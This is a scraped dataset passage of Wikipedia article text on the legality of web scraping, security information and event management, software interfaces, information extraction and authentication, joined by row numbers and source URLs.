succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
474 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Security_information_and_event_management | Security information and event management (SIEM) is a field within the field of computer security, where software products and services combine security information management (SIM) and security event management (SEM). 1 2 SIEM is typically the core component of any security operations center (SOC), which is the centralized response team addressing security issues within an organization. 3 They provide real-time analysis of security alerts generated by applications and network hardware. Vendors sell SIEM as software, as appliances, or as managed services; these products are also used to log security data and generate reports for compliance purposes. 4 The term and the initialism SIEM was coined by Mark Nicolett and Amrit Williams of Gartner in 2005. 5 Monitoring system logs has grown more prevalent as complex cyber-attacks force compliance and regulatory mechanisms to mandate logging security controls within a risk management framework (RMF). Logging levels of a system started with the primary function of troubleshooting system errors or debugging code compiled and run. As operating systems and networks have increased in complexity, so has the event and log generation on these systems. In comparison, the logging of system, security, and application logs is not the only way to perform incident response. They do offer the capability to trace the activities of nearly any system or user-related movement throughout a given period. From the late 1970s, there was a formation of working groups to help establish the criteria for the management of auditing and monitoring programs and what and how system logs can be used for insider threat, incident response, and troubleshooting. This also established a base discussion for many of the concepts still used in modern cybersecurity. See, Basis for Audit and Evaluation of Computer Security from National Institute of Standards and Technology (NIST) Special Publication 500 19 published in 1977. 6 With RMFs being implemented worldwide in nearly all industry sectors, auditing and monitoring are core elements of information assurance and information security. Information assurance personnel, cybersecurity engineers, and analysts can use logging information to perform critical security functions in real-time. These items are driven by governance models that integrate or use auditing and monitoring as a basis for that analytical work. As information assurance matured in the late 1990s and moved into the 2000s, system logs needed to be centralized. This allows records to be centrally located and viewed and provides centralized management as a 'nerve center' for all machines on a given network. This centralization and consolidation of system data would provide significantly more than just a holistic view. Still, now organizations could use the logging data for operational use cases and help with performance and networking-based communication troubleshooting. SIEM is now commonplace, and there are apparent variations of the same acronym in this article. The word SIEM is primarily a moniker forcing all logs into a single place to provide a single pane of glass for security and network operations to perform analysis. The National Institute of Standards and Technology provides the following definition of SIEM: "Application that provides the ability to gather security data from information system components and present that data as actionable information via a single interface. 7 Information assurance has become a forcing function for system logging. System logging can enable traceability for an account on a system used to perform system actions. In combination with the operating system, the SIEM can index and parse system logs and be made available for searching. On May 17, 2021, United States President Joseph Biden signed Executive Order 14028, "Improving the Nation's Cybersecurity. 8 This Executive Order mandates endpoint protection, further defining logging requirements, implementing audit logging in a unified way, and enhancing the capabilities to provide further insight into system and account actions. Audit logs were identified in three separate technical areas, all relating to incident response and knowing what is happening on a system at a given time. This Executive Order responds to an increase in cyber-attacks that use ransomware to cripple critical infrastructure components related to national security and the public. Enhancing existing information assurance security controls as part of a RMF is a suitable mechanism to force compliance and justify funding based on these Presidential requirements. NIST has helped design, implement, and propagate a federally mandated Risk Management Framework. Published in September 2006, NIST SP 800 92 Guide to Computer Security Log Management is the primary document used in the NIST Risk Management Framework for what should be auditable. While not definitive or exhaustive as there have been significant changes in technology since 2006, this guidance anticipated industry growth as the document is still relevant. This document pre-dates many modern SIEM technologies that are well known today, as evident by no reference to the term "SIEM. 9 10 NIST is not the only guidance for a regulatory mechanism for auditing and monitoring that are encouraged to use SIEM solutions instead of de-centralized individual host-based checks. NIST identifies several public and private entities with their logging guidance that may enforce its requirements; Federal Information Security Management Act of 2002 (FISMA), 11 Gramm-Leach-Bliley Act (GLBA), 12 Health Insurance Portability and Accountability Act of 1996 (HIPAA), 13 Sarbanes-Oxley Act (SOX) of 2002, 14 Payment Card Industry Data Security Standard (PCI DSS), 15 and International Organization for Standardization (ISO) 27001. 16 It is not uncommon for NIST documents to be referenced in public and private organizations. NIST SP 800 53 AU 2 Event Monitoring is a core security control for enabling logging functionality to support the information assurance process for all auditing throughout a system. 17 AU 2 Event Monitoring also serves as a critical basis for continuous monitoring for information assurance and cybersecurity engineering efforts throughout a network. It is expected that the SIEM solution is used as a core tool or suite of tools to support this effort. Depending on the system categorization concerning the impact on the Confidentiality, Integrity, and Availability (CIA) of a system are generally five specific requirements needed to satisfy the base logging requirements of a federal system (AU 2, a-e). 18 19 It is essential to understand the security control requirements about the SIEM infrastructure and operation. Below are the security control requirements for AU 2. The Assignment: organization-defined... is left blank to determine what is appropriate for its enterprise. Executive Order 14028 seeks to unify the inputs across all federal agencies. 20 a. Identify the types of events that the system is capable of logging in support of the audit function: Assignment: organization-defined event types that the system is capable of logging ; b. Coordinate the event logging function with other organizational entities requiring audit-related information to guide and inform the selection criteria for events to be logged; c. Specify the following event types for logging within the system: Assignment: organization-defined event types (subset of the event types defined in AU 2a.) along with the frequency of (or situation requiring) logging for each identified event type ; d. Provide a rationale for why the event types selected for logging are deemed to be adequate to support after-the-fact investigations of incidents; and e. Review and update the event types selected for logging Assignment: organization-defined frequency . 17 Events on a system could include and are not limited to credential changes, failed access attempts, role base or attribute changes to accounts, token-based use, access attempts, and failures, etc. While logging every system action to the system is possible, it is often not advised based on the volume of logs and actionable security-relevant data. Organizations can use AU 2 a through e, as the basis to build from while adhering to other controls that may require or call out specific security auditing requirements in more granular detail. NIST SP 800 53 SI 4 System Monitoring is the security control that specifies the monitoring of the system. 21 10 This monitoring is focused on monitoring systems that monitor the system. This can include hardware and software in unison to detect events and anomalies, malware, connections, and any other pertinent mechanism that is used to detect attacks or indicators of potential attacks. 21 a. Monitor the system to detect: b. Identify unauthorized use of the system through the following techniques and methods: Assignment: organization-defined techniques and methods ; c. Invoke internal monitoring capabilities or deploy monitoring devices: d. Analyze detected events and anomalies; e. Adjust the level of system monitoring activity when there is a change in risk to organizational operations and assets, individuals, other organizations, or the Nation; f. Obtain legal opinion regarding system monitoring activities; and g. Provide Assignment: organization-defined system monitoring information to Assignment: organization-defined personnel or roles Selection (one or more): as needed; Assignment: organization-defined frequency . 21 NIST SP 800 53 RA 10 Threat Hunting is a new base security control added to NIST 800 53 with the latest Revision 5 edit and publication. 22 10 Threat hunting is the proactive defense of a network by combining all security information and actively looking for threats. To execute the operation, the analysts and engineers need a repository of information, and a SIEM solution is often used as a hub because all system logs would typically be sent to this centralized location. A threat hunting team is not limited to this approach. However, the SIEM solution should provide significant amounts of security-relevant data. 23 a. Establish and maintain a cyber threat hunting capability to: b. Employ the threat hunting capability Assignment: organization-defined frequency . NIST SP 800 53 R5 and the brief descriptions of AU 2, SI 4, and RA 10 depict how individual controls are all used as critical elements of the event, alerting and monitoring via a SIEM. 24 These controls, combined with other technical security controls provided by NIST, weave together an in-depth defense system. The assurance of the system security is enforced with various risk assessments and continuous monitoring - often enhanced or streamlined with a SIEM product used across entire cybersecurity teams. There are many more technical controls that outline specific items that must be monitored. The controls identified are a cursory overlook of controls directly related to the event and audit gathering functionality and use in a SIEM tool. The acronyms SEM, SIM and SIEM have sometimes been used interchangeably, 25 but generally refer to the different primary focus of products: In practice many products in this area will have a mix of these functions, so there will often be some overlap and many commercial vendors also promote their own terminology. 27 Oftentimes commercial vendors provide different combinations of these functionalities which tend to improve SIEM overall. Log management alone doesn't provide real-time insights on network security, SEM on its own won't provide complete data for deep threat analysis. When SEM and log management are combined, more information is available for SIEM to monitor. A key focus is to monitor and help manage user and service privileges, directory services and other clarification needed system-configuration changes; as well as providing log auditing and review and incident response. 26 SIEM architectures may vary by vendor; however, generally, essential components comprise the SIEM engine. The essential components of a SIEM are as follows: 31 A basic SIEM infrastructure is depicted in the image to the right. Computer security researcher Chris Kubecka identified the following SIEM use cases, presented at the hacking conference 28C3 (Chaos Communication Congress). 36 SIEM systems can have hundreds and thousands of correlation rules. Some of these are simple, and some are more complex. Once a correlation rule is triggered the system can take appropriate steps to mitigate a cyber attack. Usually, this includes sending a notification to a user and then possibly limiting or even shutting down the system. Brute force detection is relatively straightforward. Brute forcing relates to continually trying to guess a variable. It most commonly refers to someone trying to constantly guess your password - either manually or with a tool. However, it can refer to trying to guess URLs or important file locations on your system. An automated brute force is easy to detect as someone trying to enter their password 60 times in a minute is impossible. When a user logs in to a system, generally speaking, it creates a timestamp of the event. Alongside the time, the system may often record other useful information such as the device used, physical location, IP address, incorrect login attempts, etc. The more data is collected the more use can be gathered from it. For impossible travel, the system looks at the current and last login date time and the difference between the recorded distances. If it deems it's not possible for this to happen, for example traveling hundreds of miles within a minute, then it will set off a warning. Many employees and users are now using VPN services which may obscure physical location. This should be taken into consideration when setting up such a rule. The average user does not typically copy or move files on the system repeatedly. Thus, any excessive file copying on a system could be attributed to an attacker wanting to cause harm to an organization. Unfortunately, it's not as simple as stating someone has gained access to your network illegally and wants to steal confidential information. It could also be an employee looking to sell company information, or they could just want to take home some files for the weekend. A DDoS (Distributed Denial of Service) Attack could cause significant damage to a company or organization. A DDoS attack can not only take a website offline, it can also make a system weaker. With suitable correlation rules in place, a SIEM should trigger an alert at the start of the attack so that the company can take the necessary precautionary measures to protect vital systems. File Integrity and Change Monitoring (FIM) is the process of monitoring the files on your system. Unexpected changes in your system files will trigger an alert as it's a likely indication of a cyber attack. Alongside correlation rules, it's also possible for SIEM to have models. Models differ somewhat from correlation rules but if implemented correctly can be just as useful. Instead of using a one-to-one correlation, a model requires a number of steps to happen in order to trigger an alert. This usually means a first-time rule followed by an anomalous behavior. This can be as simple as a user logging in from a different location than usual and then carrying out a large file transfer. This can be extremely useful as a single event does not necessarily mean a compromise of an organization's servers or network, it could just be a team member working from a caf for a change in scenery. Unfortunately, false positives appear in all walks of life, and this holds true for SIEM. All tools and systems have the possibility to produce a false-positive result. For example, too many failed login attempts can just be an employee forgetting their password and not someone trying to break into the system. It's important that for any triggered events the steps taken are justifiable and of an appropriate measure as you wouldn't want employees getting locked out for hours in such scenarios. 37 Some examples of customized rules to alert on event conditions involve user authentication rules, attacks detected and infections detected. 38 |
475 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Interface_(computing) | In computing, an interface is a shared boundary across which two or more separate components of a computer system exchange information. The exchange can be between software, computer hardware, peripheral devices, humans, and combinations of these. 1 Some computer hardware devices, such as a touchscreen, can both send and receive data through the interface, while others such as a mouse or microphone may only provide an interface to send data to a given system. 2 Hardware interfaces exist in many components, such as the various buses, storage devices, other I O devices, etc. A hardware interface is described by the mechanical, electrical, and logical signals at the interface and the protocol for sequencing them (sometimes called signaling). 3 A standard interface, such as SCSI, decouples the design and introduction of computing hardware, such as I O devices, from the design and introduction of other components of a computing system, thereby allowing users and manufacturers great flexibility in the implementation of computing systems. 3 Hardware interfaces can be parallel with several electrical connections carrying parts of the data simultaneously or serial where data are sent one bit at a time. 4 A software interface may refer to a wide range of different types of interfaces at different "levels". For example, an operating system may interface with pieces of hardware. Applications or programs running on the operating system may need to interact via data streams, filters, and pipelines. 5 In object oriented programs, objects within an application may need to interact via methods. 6 A key principle of design is to prohibit access to all resources by default, allowing access only through well-defined entry points, i.e., interfaces. 7 Software interfaces provide access to computer resources (such as memory, CPU, storage, etc.) of the underlying computer system; direct access (i.e., not through well-designed interfaces) to such resources by software can have major ramifications—sometimes disastrous ones—for functionality and stability. citation needed Interfaces between software components can provide constants, data types, types of procedures, exception specifications, and method signatures. Sometimes, public variables are also defined as part of an interface. 8 The interface of a software module A is deliberately defined separately from the implementation of that module. The latter contains the actual code of the procedures and methods described in the interface, as well as other "private" variables, procedures, etc. Another software module B, for example the client to A, that interacts with A is forced to do so only through the published interface. One practical advantage of this arrangement is that replacing the implementation of A with another implementation of the same interface should not cause B to fail—how A internally meets the requirements of the interface is not relevant to B, which is only concerned with the specifications of the interface. (See also Liskov substitution principle.) citation needed In some object-oriented languages, especially those without full multiple inheritance, the term interface is used to define an abstract type that acts as an abstraction of a class. It contains no data, but defines behaviours as method signatures. A class having code and data for all the methods corresponding to that interface and declaring so is said to implement that interface. 9 Furthermore, even in single-inheritance-languages, one can implement multiple interfaces, and hence can be of different types at the same time. 10 An interface is thus a type definition; anywhere an object can be exchanged (for example, in a function or method call) the type of the object to be exchanged can be defined in terms of one of its implemented interfaces or base-classes rather than specifying the specific class. This approach means that any class that implements that interface can be used. citation needed For example, a dummy implementation may be used to allow development to progress before the final implementation is available. In another case, a fake or mock implementation may be substituted during testing. Such stub implementations are replaced by real code later in the development process. Usually, a method defined in an interface contains no code and thus cannot itself be called; it must be implemented by non-abstract code to be run when it is invoked. citation needed An interface called "Stack" might define two methods: push() and pop(). It can be implemented in different ways, for example, FastStack and GenericStack—the first being fast, working with a data structure of fixed size, and the second using a data structure that can be resized, but at the cost of somewhat lower speed. Though interfaces can contain many methods, they may contain only one or even none at all. For example, the Java language defines the interface Readable that has the single read() method; various implementations are used for different purposes, including BufferedReader, FileReader, InputStreamReader, PipedReader, and StringReader. Marker interfaces like Serializable contain no methods at all and serve to provide run-time information to generic processing using Reflection. 11 The use of interfaces allows for a programming style called programming to the interface. The idea behind this approach is to base programming logic on the interfaces of the objects used, rather than on internal implementation details. Programming to the interface reduces dependency on implementation specifics and makes code more reusable. 12 Pushing this idea to the extreme, inversion of control leaves the context to inject the code with the specific implementations of the interface that will be used to perform the work. A user interface is a point of interaction between a computer and humans; it includes any number of modalities of interaction (such as graphics, sound, position, movement, etc.) where data is transferred between the user and the computer system. |
476 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Help:Introduction | Wikipedia is made by people like you. Get started Policies and Guidelines Editing Referencing Images Tables Editing Referencing Images Tables Talk pages Navigating WikipediaManual of StyleConclusion View all as single page For more training information, see also: Full help contents page Training for students A single-page guide to contributing A training adventure game Resources for new editors |
477 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_extraction | Data extraction is the act or process of retrieving data out of (usually unstructured or poorly structured) data sources for further data processing or data storage (data migration). The import into the intermediate extracting system is thus usually followed by data transformation and possibly the addition of metadata prior to export to another stage in the data workflow. Usually, the term data extraction is applied when (experimental) data is first imported into a computer from primary sources, like measuring or recording devices. Today's electronic devices will usually present an electrical connector (e.g. USB) through which 'raw data' can be streamed into a personal computer. Typical unstructured data sources include web pages, emails, documents, PDFs, social media, scanned text, mainframe reports, spool files, multimedia files, etc. Extracting data from these unstructured sources has grown into a considerable technical challenge, where as historically data extraction has had to deal with changes in physical hardware formats, the majority of current data extraction deals with extracting data from these unstructured data sources, and from different software formats. This growing process of data extraction from the web is referred to as "Web data extraction" or "Web scraping". The act of adding structure to unstructured data takes a number of forms |
478 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_extraction | Information extraction (IE) is the task of automatically extracting structured information from unstructured and or semi-structured machine-readable documents and other electronically represented sources. Typically, this involves processing human language texts by means of natural language processing (NLP). 1 Recent activities in multimedia document processing like automatic annotation and content extraction out of images audio video documents could be seen as information extraction. Recent advances in NLP techniques have allowed for significantly improved performance compared to previous years. 2 An example is the extraction from newswire reports of corporate mergers, such as denoted by the formal relation: from an online news sentence such as: A broad goal of IE is to allow computation to be done on the previously unstructured data. A more specific goal is to allow automated reasoning about the logical form of the input data. Structured data is semantically well-defined data from a chosen target domain, interpreted with respect to category and context. Information extraction is the part of a greater puzzle which deals with the problem of devising automatic methods for text management, beyond its transmission, storage and display. The discipline of information retrieval (IR) 3 has developed automatic methods, typically of a statistical flavor, for indexing large document collections and classifying documents. Another complementary approach is that of natural language processing (NLP) which has solved the problem of modelling human language processing with considerable success when taking into account the magnitude of the task. In terms of both difficulty and emphasis, IE deals with tasks in between both IR and NLP. In terms of input, IE assumes the existence of a set of documents in which each document follows a template, i.e. describes one or more entities or events in a manner that is similar to those in other documents but differing in the details. An example, consider a group of newswire articles on Latin American terrorism with each article presumed to be based upon one or more terroristic acts. We also define for any given IE task a template, which is a(or a set of) case frame(s) to hold the information contained in a single document. For the terrorism example, a template would have slots corresponding to the perpetrator, victim, and weapon of the terroristic act, and the date on which the event happened. An IE system for this problem is required to "understand" an attack article only enough to find data corresponding to the slots in this template. Information extraction dates back to the late 1970s in the early days of NLP. 4 An early commercial system from the mid 1980s was JASPER built for Reuters by the Carnegie Group Inc with the aim of providing real-time financial news to financial traders. 5 Beginning in 1987, IE was spurred by a series of Message Understanding Conferences. MUC is a competition-based conference 6 that focused on the following domains: Considerable support came from the U.S. Defense Advanced Research Projects Agency (DARPA), who wished to automate mundane tasks performed by government analysts, such as scanning newspapers for possible links to terrorism. citation needed The present significance of IE pertains to the growing amount of information available in unstructured form. Tim Berners-Lee, inventor of the World Wide Web, refers to the existing Internet as the web of documents 7 and advocates that more of the content be made available as a web of data. 8 Until this transpires, the web largely consists of unstructured documents lacking semantic metadata. Knowledge contained within these documents can be made more accessible for machine processing by means of transformation into relational form, or by marking-up with XML tags. An intelligent agent monitoring a news data feed requires IE to transform unstructured data into something that can be reasoned with. A typical application of IE is to scan a set of documents written in a natural language and populate a database with the information extracted. 9 Applying information extraction to text is linked to the problem of text simplification in order to create a structured view of the information present in free text. The overall goal being to create a more easily machine-readable text to process the sentences. Typical IE tasks and subtasks include: Note that this list is not exhaustive and that the exact meaning of IE activities is not commonly accepted and that many approaches combine multiple sub-tasks of IE in order to achieve a wider goal. Machine learning, statistical analysis and or natural language processing are often used in IE. IE on non-text documents is becoming an increasingly interesting topic when? in research, and information extracted from multimedia documents can now when? be expressed in a high level structure as it is done on text. This naturally leads to the fusion of extracted information from multiple kinds of documents and sources. IE has been the focus of the MUC conferences. The proliferation of the Web, however, intensified the need for developing IE systems that help people to cope with the enormous amount of data that are available online. Systems that perform IE from online text should meet the requirements of low cost, flexibility in development and easy adaptation to new domains. MUC systems fail to meet those criteria. Moreover, linguistic analysis performed for unstructured text does not exploit the HTML XML tags and the layout formats that are available in online texts. As a result, less linguistically intensive approaches have been developed for IE on the Web using wrappers, which are sets of highly accurate rules that extract a particular page's content. Manually developing wrappers has proved to be a time-consuming task, requiring a high level of expertise. Machine learning techniques, either supervised or unsupervised, have been used to induce such rules automatically. Wrappers typically handle highly structured collections of web pages, such as product catalogs and telephone directories. They fail, however, when the text type is less structured, which is also common on the Web. Recent effort on adaptive information extraction motivates the development of IE systems that can handle different types of text, from well-structured to almost free text -where common wrappers fail- including mixed types. Such systems can exploit shallow natural language knowledge and thus can be also applied to less structured texts. A recent when? development is Visual Information Extraction, 16 17 that relies on rendering a webpage in a browser and creating rules based on the proximity of regions in the rendered web page. This helps in extracting entities from complex web pages that may exhibit a visual pattern, but lack a discernible pattern in the HTML source code. The following standard approaches are now widely accepted: Numerous other approaches exist for IE including hybrid approaches that combine some of the standard approaches previously listed. |
479 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Authentication | Authentication (from Greek: authentikos, "real, genuine", from authentes, "author") is the act of proving an assertion, such as the identity of a computer system user. In contrast with identification, the act of indicating a person or thing's identity, authentication is the process of verifying that identity. 1 It might involve validating personal identity documents, verifying the authenticity of a website with a digital certificate, 2 determining the age of an artifact by carbon dating, or ensuring that a product or document is not counterfeit. Authentication is relevant to multiple fields. In art, antiques, and anthropology, a common problem is verifying that a given artifact was produced by a certain person or in a certain place or period of history. In computer science, verifying a user's identity is often required to allow access to confidential data or systems. 3 Authentication can be considered to be of three types: The first type of authentication is accepting proof of identity given by a credible person who has first-hand evidence that the identity is genuine. When authentication is required of art or physical objects, this proof could be a friend, family member, or colleague attesting to the item's provenance, perhaps by having witnessed the item in its creator's possession. With autographed sports memorabilia, this could involve someone attesting that they witnessed the object being signed. A vendor selling branded items implies authenticity, while they may not have evidence that every step in the supply chain was authenticated. Centralized authority-based trust relationships back most secure internet communication through known public certificate authorities; decentralized peer-based trust, also known as a web of trust, is used for personal services such as email or files and trust is established by known individuals signing each other's cryptographic key for instance. The second type of authentication is comparing the attributes of the object itself to what is known about objects of that origin. For example, an art expert might look for similarities in the style of painting, check the location and form of a signature, or compare the object to an old photograph. An archaeologist, on the other hand, might use carbon dating to verify the age of an artifact, do a chemical and spectroscopic analysis of the materials used, or compare the style of construction or decoration to other artifacts of similar origin. The physics of sound and light, and comparison with a known physical environment, can be used to examine the authenticity of audio recordings, photographs, or videos. Documents can be verified as being created on ink or paper readily available at the time of the item's implied creation. Attribute comparison may be vulnerable to forgery. In general, it relies on the facts that creating a forgery indistinguishable from a genuine artifact requires expert knowledge, that mistakes are easily made, and that the amount of effort required to do so is considerably greater than the amount of profit that can be gained from the forgery. In art and antiques, certificates are of great importance for authenticating an object of interest and value. Certificates can, however, also be forged, and the authentication of these poses a problem. For instance, the son of Han van Meegeren, the well-known art-forger, forged the work of his father and provided a certificate for its provenance as well. Criminal and civil penalties for fraud, forgery, and counterfeiting can reduce the incentive for falsification, depending on the risk of getting caught. Currency and other financial instruments commonly use this second type of authentication method. Bills, coins, and cheques incorporate hard-to-duplicate physical features, such as fine printing or engraving, distinctive feel, watermarks, and holographic imagery, which are easy for trained receivers to verify. The third type of authentication relies on documentation or other external affirmations. In criminal courts, the rules of evidence often require establishing the chain of custody of evidence presented. This can be accomplished through a written evidence log, or by testimony from the police detectives and forensics staff that handled it. Some antiques are accompanied by certificates attesting to their authenticity. Signed sports memorabilia is usually accompanied by a certificate of authenticity. These external records have their own problems of forgery and perjury and are also vulnerable to being separated from the artifact and lost. In computer science, a user can be given access to secure systems based on user credentials that imply authenticity. 4 A network administrator can give a user a password, or provide the user with a key card or other access devices to allow system access. In this case, authenticity is implied but not guaranteed. Consumer goods such as pharmaceuticals, perfume, and clothing can use all forms of authentication to prevent counterfeit goods from taking advantage of a popular brand's reputation. As mentioned above, having an item for sale in a reputable store implicitly attests to it being genuine, the first type of authentication. The second type of authentication might involve comparing the quality and craftsmanship of an item, such as an expensive handbag, to genuine articles. The third type of authentication could be the presence of a trademark on the item, which is a legally protected marking, or any other identifying feature which aids consumers in the identification of genuine brand-name goods. With software, companies have taken great steps to protect from counterfeiters, including adding holograms, security rings, security threads and color shifting ink. 5 The ways in which someone may be authenticated fall into three categories, based on what is known as the factors of authentication: something the user knows, something the user has, and something the user is. Each authentication factor covers a range of elements used to authenticate or verify a person's identity before being granted access, approving a transaction request, signing a document or other work product, granting authority to others, and establishing a chain of authority. Security research has determined that for a positive authentication, elements from at least two, and preferably all three, factors should be verified. 6 The three factors (classes) and some of the elements of each factor are: As the weakest level of authentication, only a single component from one of the three categories of factors is used to authenticate an individual's identity. The use of only one factor does not offer much protection from misuse or malicious intrusion. This type of authentication is not recommended for financial or personally relevant transactions that warrant a higher level of security. 2 Multi-factor authentication involves two or more authentication factors (something you know, something you have, or something you are). Two-factor authentication is a special case of multi-factor authentication involving exactly two factors. 2 For example, using a bank card (something the user has) along with a PIN (something the user knows) provides two-factor authentication. Business networks may require users to provide a password (knowledge factor) and a pseudorandom number from a security token (ownership factor). Access to a very-high-security system might require a mantrap screening of height, weight, facial, and fingerprint checks (several inherence factor elements) plus a PIN and a day code (knowledge factor elements), but this is still a two-factor authentication. The United States government's National Information Assurance Glossary defines strong authentication as a layered authentication approach relying on two or more authenticators to establish the identity of an originator or receiver of information. 7 The European Central Bank (ECB) has defined strong authentication as "a procedure based on two or more of the three authentication factors". The factors that are used must be mutually independent and at least one factor must be "non-reusable and non-replicable", except in the case of an inherence factor and must also be incapable of being stolen off the Internet. In the European, as well as in the US-American understanding, strong authentication is very similar to multi-factor authentication or 2FA, but exceeding those with more rigorous requirements. 2 8 The FIDO Alliance has been striving to establish technical specifications for strong authentication. 9 Conventional computer systems authenticate users only at the initial log-in session, which can be the cause of a critical security flaw. To resolve this problem, systems need continuous user authentication methods that continuously monitor and authenticate users based on some biometric trait(s). A study used behavioural biometrics based on writing styles as a continuous authentication method. 10 11 Recent research has shown the possibility of using smartphones sensors and accessories to extract some behavioral attributes such as touch dynamics, keystroke dynamics and gait recognition. 12 These attributes are known as behavioral biometrics and could be used to verify or identify users implicitly and continuously on smartphones. The authentication systems that have been built based on these behavioral biometric traits are known as active or continuous authentication systems. 13 11 The term digital authentication, also known as electronic authentication or e-authentication, refers to a group of processes where the confidence for user identities is established and presented via electronic methods to an information system. The digital authentication process creates technical challenges because of the need to authenticate individuals or entities remotely over a network. The American National Institute of Standards and Technology (NIST) has created a generic model for digital authentication that describes the processes that are used to accomplish secure authentication: The authentication of information can pose special problems with electronic communication, such as vulnerability to man-in-the-middle attacks, whereby a third party taps into the communication stream, and poses as each of the two other communicating parties, in order to intercept information from each. Extra identity factors can be required to authenticate each party's identity. Counterfeit products are often offered to consumers as being authentic. Counterfeit consumer goods, such as electronics, music, apparel, and counterfeit medications, have been sold as being legitimate. Efforts to control the supply chain and educate consumers help ensure that authentic products are sold and used. Even security printing on packages, labels, and nameplates, however, is subject to counterfeiting. 15 In their anti-counterfeiting technology guide, 16 the EUIPO Observatory on Infringements of Intellectual Property Rights categorizes the main anti-counterfeiting technologies on the market currently into five main categories: electronic, marking, chemical and physical, mechanical, and technologies for digital media. 17 Products or their 